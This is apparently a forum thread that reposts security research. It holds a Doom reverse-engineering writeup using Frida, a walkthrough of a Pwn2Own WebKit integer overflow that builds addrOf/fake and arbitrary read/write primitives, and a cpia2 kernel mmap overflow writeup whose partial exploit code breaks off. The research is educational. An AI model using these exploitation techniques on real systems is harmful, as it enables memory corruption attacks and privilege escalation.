compromise. This attack scenario, called Password Stuffing or Password Reuse Attack has been trendy for several years as more and more massive data leaks are happening. This tool's aim is to fill this gap by allowing you to: Flag accounts that have been reusing the same set of credentials internally and on leaked websites Easily extend the tool to implement your own internal hashing function This tool maps IDs from the internal list with IDs in the external lists to only check credentials belonging to internal users for password reuse to avoid the pitfalls mentioned above. It is also highly parallel thanks to Go's goroutines (by default it creates 30 computing threads, tunable in the code). License This project is licensed under the The 3-Clause BSD License - see the LICENSE.md file for details Sursa: https://github.com/kindredgroup/paf-credentials-checker
  12. Hacking doom for fun, health and ammo Reading time ~19 min Posted by leon on 27 November 2019 Categories: Doom, Frida, Games, Reversing, Sensecon 2019, Reverse engineering Remember iddqd and idkfa? Those are two strings were etched into my brain at a very young age where fond memories of playing shareware Doom live. For SenseCon ’19, Lauren and Reino joined me as we dove into some reversing of chocolate-doom with the aim of recreating similar cheats. The results? Well, a video of it is shown below. We managed to get cheats working that would: Increment your ammo instead of decrement it. Increment everyone’s health for the amount it would have gone down for. Yes, you read right, everyone. Toggle cheats just like how they behaved in classic doom. The source code for our cheats live here if you want to play along, or maybe even contribute new ones The setup The original Doom game was released in 1993, built for OSs a little different to what we have today. The chocolate-doom project exists and aims to be as historically correct as possible while still working on modern operating systems. Perfect nostalgia. We downloaded chocolate-doom for Windows from here, extracted and sourced a shareware WAD to use. We also set some rules for our project. The chocolate-doom source code is available, however, we did not want to reference it at all. Once extracted, chocolate-doom.exe was a stripped PE32 executable. This meant that reverse engineering efforts would be a little harder, but that was part of the challenge and learnings we wanted. Using tools such as IDA Freeware, CheatEngine and WindDBG was considered fair game though. However, any patches or binary modifications had to be implemented using Frida, and not by manually patching chocolate-doom.exe. Finding where to start – Windows Sometimes, getting started is the hardest part. We decided to get a bit of a kick start by using CheatEngine to find interesting code paths based on the games UI. First up was finding out what code was responsible for the ammo count. CheatEngine is a memory scanner and debugger that is particularly suited for this task. You can attach to a running process with CheatEngine, and scan the process’ memory to find all instances of a particular value. If our ammo count is currently 49, we can search for all instances of the value 49 in memory. There may however be quite a number of instances of this value within the process’ memory – a scan will often return several. Additionally, not all instances will be related to the ammo count. Searching for the value 49 returns several memory locations To pinpoint exactly the right location, we can can change the value a bit, and then rescan using CheatEngine for any instances of the previously found value that was altered by the same amount. We could do this by shooting the handgun a few times and taking note of by how much the ammo count was changed. We can then use the “Next Scan” function and the “Decreased value by” scan type option to search in CheatEngine for a value that has also changed by the same amount. This decreased the amount of possible locations for the ammo count to only three. Only three possible locations found for the ammo count. At this point all the possible instances could be either the original, or a copy of the original ammo count. We can watch these memory locations to determine which instructions write to them in an attempt to identify the code that is responsible for decreasing the ammo. To do this in CheatEngine, you can simply click right a watched memory location, and select “Find out what writes to this address”. Watching updates to a memory location. When watching the first two locations we identified, we saw instructions rapidly writing to the target pointers even while the game was paused. These instructions also didn’t subtract from the ammo count which meant that these instructions were probably not what we were looking for. A rapid firing instruction on the watched memory location. The third match we had saw writes only when the handgun was fired. The instruction was a subtraction by one and therefore likely the instruction to decrease the ammo count we are interested in. CheatEngine allows you to disassemble code around the identified instruction. Using this, we had the location of the instruction responsible for decreasing the ammo count when the handgun was shot at 0x0430A2c. Instruction to reduce the handgun’s ammo by 1 Finding where to start – Linux While not the primary target for our project, we also had a go at patching the chocolate-doom ELF binary. This was all done on an Ubuntu machine using similar tools as mentioned above, however, cheat engine was not available for Linux. Instead, to start finding interesting code paths in the ELF binary, we used a tool called scanmem which is similar to CheatEngine, but only gives the addresses of a value in memory and not which instruction alters it. After starting up scanmem and entering the changing ammo value a couple of times, it also isolated 3 possible addresses for ammo. These would change at each invocation of chocolate-doom because of the use of ASLR. Scanmem showing the addresses storing the current ammo value. To find out what instructions write to the identified pointers, we used gdb and set a watchpoint on each address found by scanmem. Watch points set for the ammo decrease. We then continued the game and shot once with the handgun to trigger a watchpoint. You can see the old and new ammo value below. Watchpoint triggered after shooting with the handgun. Next was to check where the instruction pointer was and to view the instructions surrounding it to see if we could spot the exact instruction that subtracts one from the ammo value each time a shot is fired. rip and the surrounding instructions As you can see, there is a sub instruction just before where the instruction pointer is currently sitting. To search for the exact instruction in IDA, we viewed the hex value of the instruction in gdb. Viewing the sub instruction in hex Because the below values are little endian, we searched for the opcodes 83 ac 83 a8 in IDA and had the offset location of the instruction responsible for decreasing the ammo count when the handgun was shot, i.e. 0x49F28. Watching functions with Frida With some target offsets at hand, we could start to watch them in real time with Frida. Frida has an Interceptor API, that allows you to “intercept” function calls and execute code as a function prolog or epilog. One also has access to the arguments and the return value using the Interceptor, making it possible to log and if needed, change these values. Given that we know which instructions were writing to memory regions that contained the ammo value for our handgun, we used IDA to analyse the function around the instruction to find the entry point for it. This way we would know which memory address to use with the Interceptor. Entrypoint into the function that affected the handgun’s ammo As you can see in the screenshot above, the function starts at 0x4309f0. With a base of 0x400000 that means that the function’s offset is just 0x309f0 from that (this will be important later). With a known offset, our first Frida script started. This script would simply find the chocolate-doom module’s base address, calculate the offset to the function we are interested in and attach the Interceptor. The Interceptor onEnter callback would then simply log that the function triggered. Interceptor attached to the hangun fire function’s entry point We can see this script in action when attached to chocolate-doom below. Knowing that function triggers as we fire the handgun helps confirm that we are on the right track. Our first cheat We figured we would start by writing a simple patch that just replaces the instruction to decrement the ammo count by 1 with NOP instructions. Frida has a Code writer module that can help with this. The original decrement instruction was sub dword ptr [ebx+edx*4+0A4h], 1 which is represented as 8 opcodes when viewed in hex. Hex opcodes for the instruction decrementing ammo of the handgun The code writer could be used to patch 0x430a2c with exactly 8 NOP instructions using the putNopPadding(8) method on a code writer instance. Frida code writer used to replace the ammo decrementing instructions with 8 NOPs. Applying this patch meant that we no longer ran out of ammo with the handgun. Improving the first ammo cheat To test how effective our NOP-based cheat was, we used one of the original cheats (“idkfa”) to get all of the available guns and ammo and see if it worked for those as well. Turns out, it didn’t, and some investigation revealed that each gun had its own ammo decrementing function. All functions eventually called an opcode that would SUB 0x1 from an ammo total (except for the machine gun that would SUB 0x2). An improvement was necessary. We didn’t want to hardcode all of the instructions we found and looked for other options. When searching in IDA for the opcodes 0x83 0xac (part of the ammo SUB opcodes for sub dword ptr [ebx+edx*4+0A4h], 1), we noticed that the only matches were those that formed part of functions that decremented ammo. Frida has a memory scanner that we could use to match the locations of these functions that we were interested in dynamically (as 0x83 0xac), available as Memory.scanSync(). We then used the same Memory.patchCode() function to simply override the opcodes to ADD instead of SUB as a simple two-byte patch Ammo patcher to increment instead of decrement ammo for each matched opcode search This patch was a little more generic and did not require any hardcoded offsets to work. Depending on what you are working with, a better search may be to use some of the wildcarding features of Memory.scanSync() so that you can have much more specific matches. With our patch applied, all weapons now incremented their ammo count as you fired. Writing a health cheat After fiddling with ammo related routines, we changed our focus to health. We used the same CheatEngine technique as before to figure out where our health was being stored and who was writing to those locations. Finding the health locations however turned out to be a bit more tricky, as around four to five different locations would appear between different searches. Some of these locations had rapid firing instructions executing writes on them, as before with the ammo count, and were thus ignored. Around three locations had instructions which triggered when the player’s health decreased. The locations for the player’s health. The instructions were however not sub instructions, but rather mov instructions. Looking at the disassembled code, we could however spot the sub instruction a few lines higher up. One of the set of instructions that triggered when a player’s health decreased. Note the sub instruction above the mov instruction, that did the actual subtraction. What is important to note is that instruction was a subtraction between two registers, i.e. sub eax, esi. This is a fairly common instruction, and meant that we can’t just scan for all instances of it in memory and replace it with an add instruction like we did with the ammo increment patch. Instead, we manually went to the location of each of the sub instructions, and changed it to an add instruction. When viewed as opcodes, sub eax, esi is 0x29 0xF0, while add eax, esi is 0x01 0xF0. So, a patch was simply a case of swapping out the 0x29 for a 0x01. The sub instructions for the three different functions were at 0x3DEEC, 0x2C385, and 0x2c39. Patching 0x3DEEC however often caused the game to crash, so it was removed later on. Patching 0x2C385, and especially 0x2c39 made the player’s health increase when attacked. It however also has the side effect of making all monster’s health increase as well when they are attacked – this might be because both the player and monsters in the game use the same logic for health deduction. ¯\_(?)_/¯ Health patch to ADD instead of SUB With this patch applied, the incrementing health cheat could be seen in the following video. Making our patches, cheats – static analysis Up to now we have been patching chocolate-doom for our cheats as soon as Frida was injected and our scripts were run. We really wanted to make our cheats behave like the originals did by simply typing them in the game, “iddqd” and “idkfa” style. To implement this the chocolate-doom binary was analysed to find the logic that handles the current cheats. We knew that if you typed “idkfa”, the game would pop up a message saying “VERY HAPPY AMMO ADDED”. Message after using the idkfa cheat A text search in IDA for this message revealed the location where it was used. Very Happy Ammo Added search in IDA We focussed on the function this reference was in and realised that it was an incredibly long function. In fact, it appeared as though all of the cheats were processed by this single function, with a bunch of branches for each cheat. Code paths could be seen in the IDA graph view and gave us a reasonable idea of its complexity. IDA graph view of the cheat function All of the different cheats branches also made a call to a function that lived at 0x040FE90. This function took two arguments, one being a character array and another an integer and appeared to be comparing a character to a string. Comparison function called for each cheat in the previous routine. Making our patches, cheats – dynamic analysis We decided to have a look at the invocation of this cheat comparison function (henceforth called cheat_compare) at runtime, dumping the arguments it receives. Just like we have previously used the Frida Interceptor to attach to a function, we simply calculate the offset for cheat_compare and log the arguments it receives. This will also give us an opportunity to try and discover how to trigger this function in game. From IDA we knew the first argument was a character array, so we just dumped the raw string using the readCString() Frida method for that. For the second argument we weren’t entirely sure what that would have been, and left it raw for now. Argument dumping using the Frida Interceptor for cheat_compare With this script hooked, the results were rather… surprising… Every keypress the game received appeared to enter the identified compare function we called cheat_compare. Even arrow keys! In the video demo above, we slowly entered the cheat “iddqd”, where you can see many of the possible cheats Doom has being compared to the hex value of the ASCII character we entered. Once the cheat matched, we moved Doom guy left a few times using an arrow key, which is where values such as 0xffffffac entered the routine for a bunch of possible cheats too. Without understanding the full cheat routine, we were sure these would never match something legitimate, so we suspected we may have found an optimisation opportunity here Making our patches, cheats – implementation The two arguments cheat_compare was receiving was enough for us to start building our own implementation. In fact, receiving the keycodes entered was all we needed. We could have gone and tried to patch the original routine to match some new strings and trigger our patches, but instead we chose an easier way out. We can read the keycodes that cheat_compare received, perform some tests for our cheats and then let the original function continue as normal. Herein lies an important concept I suspect many don’t immediately realise when using Frida. While Frida is a fantastic runtime instrumentation library, it can also be used to easily execute some JavaScript logic from within any function. In other words, we can introduce and execute code that was *not* part of the original binary, from within that binary. We don’t have to patch some code to jump to opcodes we have wrote, no, we can just execute pure JavaScript. The cheat_compare method, admittedly, was a little confusing. We decided to use the keycode we got as an argument, but had to work around the fact that we would receive the same keycode a number of times as the method was repeatedly called for different cheats with the same keycode. As a result, we decided on simply recording unique keycodes . This introduced only one limitation; our cheats couldn’t have repeating characters. The result was a method that would check a character and append it if it was unique, returning the full recorded buffer if a new character was added. Method used to record keycodes received in cheat_compare() Next, we attached to cheat_compare and fired this new getCheatFromBufWithChar() to get the buffer of characters that were entered thus far. If a buffer ended with one of our strings, we fired the relevant patch to activate the cheat! To optimise the routine a little, we exited early if the entered keycode was not in the ASCII printable range. cheat_compare entrypoint used to match new, custom cheats The result of this script meant that any unique ascii characters that were read would be compared to toggle the status of a cheat. This also meant that we had to write smaller routines that would undo the patches we wrote, but those were relatively easy as we already knew the offsets and original opcodes. The final script to play with these cheats is available here. Conclusion While choosing Doom may have been an easy target, we learnt a lot and got to play games while at it! We hope this inspires you to dig a little deeper into Frida and experiment more with it. Sursa: https://sensepost.com/blog/2019/hacking-doom-for-fun-health-and-ammo/
  13. What is this? This is publicly accessible personal notes at https://ired.team and https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. {% hint style="warning" %} Do not take everything or anything for granted nor expect the notes to be very detailed or covering the techniques or the artifacts they produce in full and always consult additional resources. {% endhint %} The following sub-pages of this page will explore some of the common offensive security techniques involving gaining code execution, lateral movement, persistence and more. This is my way of learning things - I learn by doing, repeating and taking notes. Most of these techniques are discovered by other security researchers and I do not claim their ownership. I try to reference the sources I use the best I can, but if you think I've missed something, please get in touch and I will fix it immediately. The Goal The goal of this project is simple - read other researchers work, execute some common/uncommon attacking techniques in a lab environment and: understand how the attacks can be performed write code to further the understanding of some of the tools and techniques see what most common artifacts the techniques leave behind try out various industry tools and become more profficient in using them take notes for future reference Social Follow me on twitter: {% embed url="https://twitter.com/spotheplanet" %} Sursa: https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques
      • 1
      • Thanks
  14. Colin Hardy Here I describe how you can analyse a very stealthy technique to execute shellcode via Process Injection from an old-skool Excel Macro technique, known as Excel 4.0 Macros. This seems to be a technique favoured by many APT's and Red Teams given the lack of detection by lots of anti-malware technology. The sample attempts to inject shellcode which transpires to be a Cobalt Strike beacon which uses Domain Fronting to access its C2. The sample was provided by Arti Karahoda, definitely give him a follow: https://twitter.com/w1zzcap The sample can be obtained from here: https://app.any.run/tasks/e8db83aa-89... Also, I mention a few resources in the video, as follows: https://outflank.nl/blog/2018/10/06/o... https://d13ot9o61jdzpp.cloudfront.net... http://www.hexacorn.com/blog/2015/12/... Thanks for the sample Arti! Hope you all like the video and the techniques used and hopefully this will help protect you in your own environments. If you liked the video, hit the thumbs up. If you loved it, please subscribe. Find Me: https://twitter.com/cybercdh https://colin.guru Thanks! Colin
  15. Diving Deep Into a Pwn2Own Winning WebKit Bug November 26, 2019 | Ziad Badawi SUBSCRIBE Pwn2Own Tokyo just completed, and it got me thinking about a WebKit bug used by the team of Fluoroacetate (Amat Cama and Richard Zhu) at this year’s Pwn2Own in Vancouver. It was a part of the chain that earned them $55,000 and was a nifty piece of work. Since the holidays are coming up, I thought it would be a great time to do a deep dive into the bug and show the process I used for verifying their discovery. Let’s start with the PoC: First of all, we need to compile the affected WebKit version which was Safari version 12.0.3 at the time of the springtime Pwn2Own 2019 contest. According to Apple's releases, this translates to revision 240322. svn checkout -r 240322 https://svn.webkit.org/repository/webkit/trunk webkit_ga_asan Let's compile it with AddressSanitizer (ASAN). This will allow us to detect memory corruption as soon as it happens. ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/set-webkit-configuration --asan ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/build-webkit # --jsc-only can be used here which should be enough We are going to use lldb for debugging because it is already included with macOS. As the POC does not include any rendering code, we can execute it using JavaScriptCore (JSC) only in lldb. For jsc to be executed in lldb, its binary file needs to be called instead of the script run-jsc. This file is available in WebKitBuild/Release/jsc and an environment variable is required for it to run correctly. I should point out that: env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release can be run within lldb, but placing it in a text file and passing that to lldb -s is the preferred method. ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release r Let’s start debugging. It crashes at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8, which appears to be an out-of-bounds write. The stack trace shows that this occurs in the VM, meaning in compiled or JIT’ed code. We also notice that rsi, used as the index, contains 0x20000040. We have seen that number before in the POC. It is the size of bigarr! (minus one), which is essentially NUM_SPREAD_ARGS * sizeof(a). In order to see the JITed code, we can set the JSC_dumpDFGDisassembly environment variable so jsc can dump compiled code in DFG and FTL. ZDIs-Mac:webkit_ga_asan zdi$ JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js This will dump a lot of extraneous assembly. So, how are we going to pinpoint relevant code? We know that the crash happens at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8. Why don’t we try searching for that address? It might lead to something relevant. Bingo! Right in the DFG. The NewArrayWithSpread is called when creating a new array using the spread operator ... in the DFG JIT tier. This occurs in function f that is generated by gen_func and called in a loop. The main reason for iterating ITERS times in f is to make that part of the code hot, causing it to be optimized by the DFG JIT tier. Digging through the source code, we find the function SpeculativeJIT::compileNewArrayWithSpread in Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp. This is where DFG emits code. Emitting code means writing the JIT-produced machine code into memory for later execution. We can understand that machine code by taking a look at compileNewArrayWithSpread. We see compileAllocateNewArrayWithSize() is responsible for allocating a new array with a certain size. Its third parameter, sizeGPR, is passed to emitAllocateButterfly() as its second argument, which means it will handle allocating a new butterfly, memory space containing values of a JS object, for the array. If you aren’t familiar with the butterfly of JSObject, more info may be found here. Jumping to emitAllocateButterfly(), we see that the size parameter sizeGPR is shifted 3 bits to the left (multiplied by 😎 and then added to the constant sizeof(IndexingHeader). To make things simpler, we need to match the actual machine code to the C++ code we have in this function. The m_jit field is of type JITCompiler. DFG::JITCompiler is responsible for generating JIT code from the dataflow graph. It does so by delegating to the speculative & non-speculative JITs, which generate to a MacroAssembler (which the JITCompiler owns through an inheritance relationship). The JITCompiler holds references to information required during compilation, and also records information used in linking (e.g. a list of all calls to be linked). This means the calls you see, such as m_jit.move(), m_jit.add32(), etc., are functions that emit assembly. By tracking each one we will be able to match it with its C++ counterpart. We configure lldb with our preference of Intel assembly, in addition to the malloc debugging feature for tracking memory allocations. ZDIs-Mac:~ zdi$ cat ~/.lldbinit settings set target.x86-disassembly-flavor intel type format add --format hex long type format add --format hex "unsigned long" command script import lldb.macosx.heap settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib settings set target.env-vars MallocStackLogging=1 settings set target.env-vars MallocScribble=1 Because a large size is being allocated with Guard Malloc enabled, we need to set another environment variable that will allow such allocation. ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release env MALLOC_PERMIT_INSANE_REQUESTS=1 r JSC_dumpDFGDisassembly will dump assembly in AT&T format, so we run disassemble -s 0x6400042d1c22 -c 70 to get it in Intel flavor which will end up as the following: Let us try to match some code from emitAllocateButterfly(). Looking at the assembly listing, we can match the following: It is time to see what the machine code is trying to do. We need to set breakpoint there and see what is going on. To do that, we added a dbg() function to jsc.cpp before compilation. This will help a lot in breaking into JS code whenever we want. The compiler complained that exec in the EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec) function was not used, so it failed. To go around that, we just added exec->argumentCount(); which should not affect execution. Let’s add dbg() here, because the actual NewArrayWithSpread function will be executed during the creation of bigarr. Running JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js again will dump the assembly and stop at: This breaks exactly before the creation of bigarr, and you can see the machine code for NewArrayWithSpread. Let us put a breakpoint on the start of the function and continue execution. The breakpoint is hit! Before stepping through, let’s talk a little about what a JS object looks like in memory. describe() is a nice little function that only runs in jsc. It shows us where a JS object is located in memory, its type, and a bit more, as displayed below: Notice above how the arr_dbl object changes types from ArrayWithDouble to ArrayWithContiguous after adding an object. This is because its structure changed, it no longer stores only double values but multiple types. A JS object is represented in memory as follows: Let’s start with the arr array in the example above. By dumping the object address 0x1034b4320, we see above two quadwords. The first is a JSCell and the second is the butterfly pointer. The JSCell consists of -- StructureID m_structureID; # e.g. 0x5f (95) in the first quadword of arr object. (4 bytes) -- IndexingType m_indexingTypeAndMisc; # 0x05 (1 byte) -- JSType m_type; # 0x21 (1 byte) -- TypeInfo::InlineTypeFlags m_flags; # 0x8 (1 byte) -- CellState m_cellState; # 0x1 (1 byte) The butterfly pointer points to the actual elements within the array. The values 1,2,3,4,6 are shown here starting with 0xffff as this is how integers are represented in memory as a JSValue. If we go back 0x10 bytes, we see the array length, which is 5. Some objects do not have a butterfly, so their pointer is null or 0 as shown below. Their properties will be stored inline as displayed. This script will help for double-to-memory address conversion and vice versa. This was a short intro but for more information and details on structures, butterflies, properties, boxing, unboxing and JS objects, check Saelo’s awesome article and talk. In addition to that, check out LiveOverflow's great series on WebKit. Let’s continue stepping through the breakpoint. All right, so, what is going on here? Note this part from the PoC: The mk_arr funtions creates an array with the first argument as size and second argument as elements. The size is (0x20000000 + 0x40) / 8 = 0x4000008, which creates an array with size 0x4000008 and element values of 0x4141414141410000.The i2f function is for converting an integer to a float so that it ends up with the expected value in memory. LiveOverflow explains it well in his WebKit series. Given that, we now know that rcx points to object a’s butterfly - 0x10 because its size is rcx + 8, which makes the butterfly rcx + 0x10. Going through the rest of this code, we see that r8, r10, rdi, r9, rbx, r12, and r13 all point to a copy of object a - eight copies to be specific, and edx keeps adding the sizes of each. Looking at edx, its value becomes 0x20000040. So, what are those eight a copies? And what is the value 0x20000040? Looking back at the PoC: The means f becomes: f creates an array by spreading NUM_SPREAD_ARGS (8) copies of the first argument and a single copy of its second argument. f is called with objects a (8 * 0x04000008) and c (length 1). When NewArrayWithSpread gets called, it makes room for those 8 a’s and 1 c. The last step through shows length of object c, which makes the final edx value 0x20000041. The next step should be the allocation of that length, which happens inside emitAllocateButterfly(). We notice the overflow that occurs at shl r8d, 0x3 where 0x20000041 gets wrapped around to 0x208. The allocation size becomes 0x210 when it gets passed to emitAllocateVariableSized(). The out-of-bounds read access violation we see happens in the following snippet on mov qword ptr [rcx + 8*rsi], r8. What this snippet does is iterate the newly created butterfly backwards with incorrect size 0x20000041 while the real size is 0x210 after the overflow. It then zeros out each element but since the actual size in memory is way smaller than 0x20000041, it reaches an out-of-bounds access violation in the ASAN build. The Primitives This might seem like just an integer overflow, but it is much more than that. When the allocation size wraps around, it becomes smaller than the initial value thus enabling the creation of an undersized butterfly. This would trigger a heap overflow later when data gets written to it, so other arrays in its vicinity will get corrupted. We are planning on doing the following: - Spray a bunch of arrays - Write to bigarr in order to cause a heap overflow that will corrupt sprayed arrays - Use corrupted arrays to achieve read (addrOf) / write (fake) to the heap using fake JS objects The following snippet shows the spray. When f() is called, the integer overflow will trigger when creating a butterfly with length 0x20000041, thus producing an undersized one because of the wraparound. However, 0x20000041 elements will be written nonetheless, leading to a heap overflow. When c is accessed, the defined getter of its first element will set off and fill up the spray array with 0x4000 elements of newly created arrays from the slice() call. The large number of butterflies created in spray and the huge length of bigarr’s butterfly are bound to overlap at some point because of the heap overflow and that butterflies are created in the same memory space. After executing the POC in a non-ASAN release build, we get the following. We notice how the butterfly of one of spray’s objects (that are either spray_arr or spray_arr2) towards the end was overlapped by bigarr. The following might help in visualizing what is going on. It is important to note here the types of spray_arr and spray_arr2 as it is necessary for constructing the exploit primitives. They are ArrayWithDouble and ArrayWithContiguous respectively. This means that an array with type ArrayWithDouble contains non-boxed float values, which means an element is written and read as a native float number. ArrayWithContiguous is different as it treats its elements as boxed JSValues so it reads and writes JS objects. The basic idea is finding a way for writing an object to the ArrayWithContiguous array (spray_arr2) and then reading its memory address from the ArrayWithDouble array (spray_arr). The same is true vice versa where we write a memory address to spray_arr and read it as an object using spray_arr2. In order to do that, we need to get hold of the overlapped space using the two arrays spray_arr and spray_arr2. Let us take a look at the following: This snippet is looping spray, specifically the ArrayWithDouble instances (spray_arr), and breaking when it finds the first overlapped space with bigarr, thus returning its index, oobarr_idx, in spray and a new object, oobarr, pointing to that space. The main condition to satisfy for breaking is spray.length > 0x40 because when spray points to the bigarr data, which consists of 0x4142414141410000. Its length will be located 8 bytes back, which is also 0x4142414141410000. This makes the length be 0x41410000, which is > 0x40. What is oobarr? It is an array of type ArrayWithDouble pointing to the beginning of the overlapped space between spray and bigarr. The oobarr[0] function should return 0x4142414141410000. The oobarr array is the first one we can use in order to read and write object addresses. contarr is an array of type ArrayWithContiguous pointing to a space that is shared with oobarr. Below shows the snippet executed: The following shows both addrOf and fake primitives. The addrOf primitive is used to return an address of any JS object by writing it to the ArrayWithContiguous array and reading it from the ArrayWithDouble array as a float. The fake primitive is the opposite. It is used to create a JS object from a memory address by writing the address to ArrayWithDouble and reading from ArrayWithContiguous. It is clear in the debugger output that both primitives work as expected. The next step is achieving arbitrary read/write by creating a fake object and controlling its butterfly. We know by now that objects store data in their butterfly if they are not inline. This looks like (from Filip Pizlo's talk😞 Check out the following: We create an empty array (length 0) with a single property, p0, containing a string. Its memory layout is shown below. When we go butterfly 0x10, we see the quadwords for length and the first property. Its vector length is 0, while the property points to 0x1034740a0. It should be clear by now that in order to access a property in an object, we get the butterfly then subtract 0x10. What happens if we control the butterfly? Well, arbitrary read and write happens. For any JS object to be valid in memory, its JSCell must be valid as well, and that includes its structure ID. Structure IDs cannot be generated manually, but they are predictable, at least on the build we are working on. Since we are planning on creating a fake object, we need to make sure it has a valid JSCell. The following snippet sprays 0x400 a objects so we can predict a value between 1 and 0x400 for its structure ID. We need to create a victim object that we control. Take a look at the following: mngr is the middle object in struct_spray, and we create victim making sure it resides in the address range after mngr’s address. We are going to use the outer object to create the fake object hax. The first property a is basically going to be the JSCell of the fake object. It will end up as 0x0108200700000200, which means 0x200 is the structure ID we predicted. The - (1<<16) data-preserve-html-node="true" part is just to account for the boxing effect (which adds 2^48) when that value is stored in the object. The b property will be the butterfly of the fake object. To create hax, we get the outer address and then add 0x10 to it. We then feed the result to fake that was created earlier. The object’s layout is shown in lldb output below. When accessing an index of hax, it means we are accessing the memory space starting from mngr’s address shown below. Since objects are located in the same space and victim was created last, it is located after mngr. Subtracting mngr_addr fromvictim_addr, we can reach victim’s JSCell and butterfly (+8) when indexing the result in hax. Let's achieve arbitrary read/write: As we mentioned previously, when accessing victim.p0, its butterfly is fetched then goes backwards 0x10 in order to grab its first property. set_victim_addr sets victim’s butterfly to the value we provide plus 0x10. It is easier to look at it in the debugger. Looking at the dump above, we notice that originally, victim’s butterfly was 0x18014e8028. Later, it became 0x18003e4030, which is actually test’s address plus 0x18. When read64 is called, it is passed test’s address plus 8 since we are trying to read its butterfly. Within set_victim_addr, another 0x10 is added to the address. When victim.p0 is read, its butterfly 0x2042fc058 is fetched, then 0x10 is subtracted. This results in 0x2042fc048, which actually points to test's butterfly. victim.p0 actually fetches the value that is pointed by the property address (0x18003e4030 in this case). Adding an addrOf() to that will get us the actual 0x18003e4030 value. Now we have achieved arbitrary read. Writing is similar as shown in write64 where we write to victim.p0 a value using fake(). Neat, right? Conclusion I hope you have enjoyed this in-depth walkthrough. Bugs that come into the program through Pwn2Own tend to be some of the best we see, and this one is no exception. I also hope you learned a bit about lldb and walking through WebKit looking for bugs. If you find any, you know where to send them. 😀 You can find me on Twitter at @ziadrb, and follow the team for the latest in exploit techniques and security patches. Sursa: https://www.thezdi.com/blog/2019/11/25/diving-deep-into-a-pwn2own-winning-webkit-bug
  16. Kernel Research / mmap handler exploitation November 22, 2019 Description Recently I started to review the linux kernel, I’ve putted much time and effort trying to identify vulnerabilities. I looked on the cpia2 driver , which is a V4L driver , aimed for supporting cpia2 webcams. official documentation here. I found a vulnerability in the mmap handler implementation of the driver. Kernel drivers may re-implement their own mmap handlers , usually for speeding up the process of exchanging data between user space and kernel space. The cpia2 driver re-implement a mmap hanlder for sharing the frame’s buffer with the user application which controls the camera. — Lets get into it Here is the userspace mmap function prototype (taken from man): void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); Here the user supplies parameter for the mapping , we will be interested in the size and offset parameters. length - will determine the length of the mapping offset - will determine the offset from the beginning of the device we will start the mapping from. The driver’s specific mmap handler will remap kernel memory to userspace using a function like remap_pfn_range CVE-2019-18675 Lets have a look at the cpia2 mmap handler implementation: We can see the file_operations struct: /*** * The v4l video device structure initialized for this device ***/ static const struct v4l2_file_operations cpia2_fops = { .owner = THIS_MODULE, .open = cpia2_open, .release = cpia2_close, .read = cpia2_v4l_read, .poll = cpia2_v4l_poll, .unlocked_ioctl = video_ioctl2, .mmap = cpia2_mmap, }; Lets look at the function cpia2_mmap static int cpia2_mmap(struct file *file, struct vm_area_struct *area) { struct camera_data *cam = video_drvdata(file); int retval; if (mutex_lock_interruptible(&cam->v4l2_lock)) return -ERESTARTSYS; retval = cpia2_remap_buffer(cam, area); if(!retval) cam->stream_fh = file->private_data; mutex_unlock(&cam->v4l2_lock); return retval; } It just calls the function cpia2_remap_buffer() with a pointer to the camera_data struct: /****************************************************************************** * * cpia2_remap_buffer * *****************************************************************************/ int cpia2_remap_buffer(struct camera_data *cam, struct vm_area_struct *vma) { const char *adr = (const char *)vma->vm_start; unsigned long size = vma->vm_end-vma->vm_start; unsigned long start_offset = vma->vm_pgoff << PAGE_SHIFT; unsigned long start = (unsigned long) adr; unsigned long page, pos; DBG("mmap offset:%ld size:%ld\n", start_offset, size); if (!video_is_registered(&cam->vdev)) return -ENODEV; if (size > cam->frame_size*cam->num_frames || (start_offset % cam->frame_size) != 0 || (start_offset+size > cam->frame_size*cam->num_frames)) return -EINVAL; pos = ((unsigned long) (cam->frame_buffer)) + start_offset; while (size > 0) { page = kvirt_to_pa(pos); if (remap_pfn_range(vma, start, page >> PAGE_SHIFT, PAGE_SIZE, PAGE_SHARED)) return -EAGAIN; start += PAGE_SIZE; pos += PAGE_SIZE; if (size > PAGE_SIZE) size -= PAGE_SIZE; else size = 0; } cam->mmapped = true; return 0; } we can see that start_offset + size is being calculated , and the sum is being compared to the total size of the frames: if(... || (start_offset+size > cam->frame_size*cam->num_frames)) return -EINVAL; However, the calculation start_offset + size could wrap-around to a low value (a.k.a Integer Overflow), allowing an attacker to bypass the check while still using a big start_offset value which will lead to mapping of unintended kernel memory. The only requirement is that the start_offset value will be a multiple of the frame_size (which can be controlled by the cpia2 driver options, by default its 68k). And this can be quite bad because a huge offset will allow us to perform a mapping in an arbitrary offset (outside of the frame buffer’s bounds) , and this can possibly result in a privillege escalation Demo time! I’ve used a qemu kernel virtual machine (here). Now we have to: Open /dev/video0 mmaping size 0x11000 at offset 0xffffffffffff0000. The overlow will ocuur and we will pass the check Here is a minimalistic example for exploit code: #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/types.h> #include <unistd.h> #define VIDEO_DEVICE "/dev/video0" int main(){ pid_t pid; char command[40]; int fd = open(VIDEO_DEVICE , O_RDWR); if(fd < 0){ printf("[-]Error opening device file\n"); } 